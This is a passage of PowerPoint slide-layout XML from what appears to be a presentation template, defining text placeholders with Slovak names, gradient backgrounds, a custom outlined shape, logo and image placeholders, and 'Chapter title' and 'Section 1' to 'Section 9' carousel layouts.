          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301198" y="7287022"/>
            <a:ext cx="0" cy="934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ástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01841E45-F5E2-7268-541A-780F4DA99F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98392" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B961D913-3780-4E99-FD9A-ECF7C353A1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98392" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C6927E-6BF2-A924-3AB2-8C1BAA347B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2280" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0328C0DE-966E-9B5B-51D4-141700B348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2280" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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786816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bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="69000">
              <a:schemeClr val="tx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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26359470" y="-21748000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69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295401" y="4390793"/>
            <a:ext cx="15394710" cy="1505414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10800" b="1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Chapter title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1F1BAC-82B3-ADAC-B575-E217F5EF9FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11124389" y="-7624838"/>
            <a:ext cx="33733770" cy="25536676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51FFAB78-CBD3-DBEC-B5A8-87AD2A26FE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650601" y="-12612233"/>
            <a:ext cx="39337158" cy="39337158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69000">
                <a:schemeClr val="accent4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161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- co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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104902" y="-5133404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66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295401" y="4390793"/>
            <a:ext cx="15394710" cy="1505414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10800" b="1" i="0" baseline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Chapter title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 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D74F07D0-04F0-F089-758A-528C8071E52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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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25D50483-88DA-306A-D4C7-968D5CD052A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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7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149CE04-4FC6-8CB5-1D61-C9D365BDF8A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7178" y="0"/>
            <a:ext cx="13591424" cy="340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6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- carousel 0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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7A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04902" y="-5133404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66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3" name="!!LOGO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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!CODE1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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!CODE2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D74F07D0-04F0-F089-758A-528C8071E5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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!CODE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25D50483-88DA-306A-D4C7-968D5CD052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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!CODE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149CE04-4FC6-8CB5-1D61-C9D365BDF8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7178" y="0"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!SECTION1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A8F22-A7A5-1DA7-642E-04BC43A933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5400" y="5368366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marL="0" lvl="0" indent="0" algn="l" defTabSz="1371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Section 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!SECTION2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="6652613"/>
            <a:ext cx="15697200" cy="669030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lang="en-US" sz="4800" b="1" i="0" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 2</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="!!SECTION3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3FBF56-33B9-1540-29A8-BF28CB5A50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5400" y="7691490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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!!!SECTION4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826949C0-26C8-EB69-893B-6F594A0D4A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95400" y="8853052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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!SECTION5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6603F797-CF2C-4F48-F949-215C741EC2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95400" y="10014614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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!SECTION6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C60611-8CC4-3419-305E-4947EA93B2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11176176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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="!!SECTION7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FD4373-0B3D-0B82-68B9-092D2D5EA8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95400" y="12337738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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!SECTION8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAF7A12-50F4-17E6-A8F9-3EC368FD6C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5400" y="13499300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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!SECTION9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77011FDD-D4C1-10E1-FADD-F12F33D3DF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95400" y="14660868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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30156654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- carousel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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7A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04902" y="-5133404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66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3" name="!!LOGO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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!CODE1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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!CODE2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D74F07D0-04F0-F089-758A-528C8071E5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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!CODE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25D50483-88DA-306A-D4C7-968D5CD052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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!CODE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149CE04-4FC6-8CB5-1D61-C9D365BDF8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7178" y="0"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!SECTION1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A8F22-A7A5-1DA7-642E-04BC43A933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5400" y="4092016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7000" b="1" i="0" kern="1200" baseline="0" dirty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marL="0" lvl="0" indent="0" algn="l" defTabSz="1371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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!SECTION2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5376263"/>
            <a:ext cx="15697200" cy="66903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sk-SK" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="!!SECTION3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3FBF56-33B9-1540-29A8-BF28CB5A50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5400" y="6537825"/>
            <a:ext cx="15697200" cy="669030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>
              <a:defRPr lang="en-US" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!!!SECTION4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826949C0-26C8-EB69-893B-6F594A0D4A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95400" y="7576702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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!SECTION5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6603F797-CF2C-4F48-F949-215C741EC2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95400" y="8738264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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!SECTION6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C60611-8CC4-3419-305E-4947EA93B2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9899826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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="!!SECTION7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FD4373-0B3D-0B82-68B9-092D2D5EA8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95400" y="11061388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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!SECTION8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAF7A12-50F4-17E6-A8F9-3EC368FD6C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5400" y="12222950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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!SECTION9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77011FDD-D4C1-10E1-FADD-F12F33D3DF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95400" y="13384518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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="647657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- carousel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!!LIGHT-TURQ">
            <a:extLst>
